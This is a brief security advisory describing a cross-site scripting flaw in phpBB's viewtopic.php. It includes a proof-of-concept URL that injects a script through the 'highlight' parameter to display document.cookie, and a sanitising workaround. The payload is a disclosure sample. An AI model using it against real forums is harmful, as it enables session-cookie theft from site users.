|
|
| |
| phpBB is one of popular PHP bulletin board systems. A vulnerability in the viewtopic.php allows remote attackers to insert malicious JavaScript code. |
| |
Credit:
The information has been provided by Arab VieruZ.
|
| |
Exploit:
http://phpbb/phpBB/viewtopic.php?t=17071&highlight=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>
Possible workaround:
Open viewtopic.php and put this code:
$highlight = htmlspecialchars($highlight);
$highlight = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "",
$highlight);
|
|
|
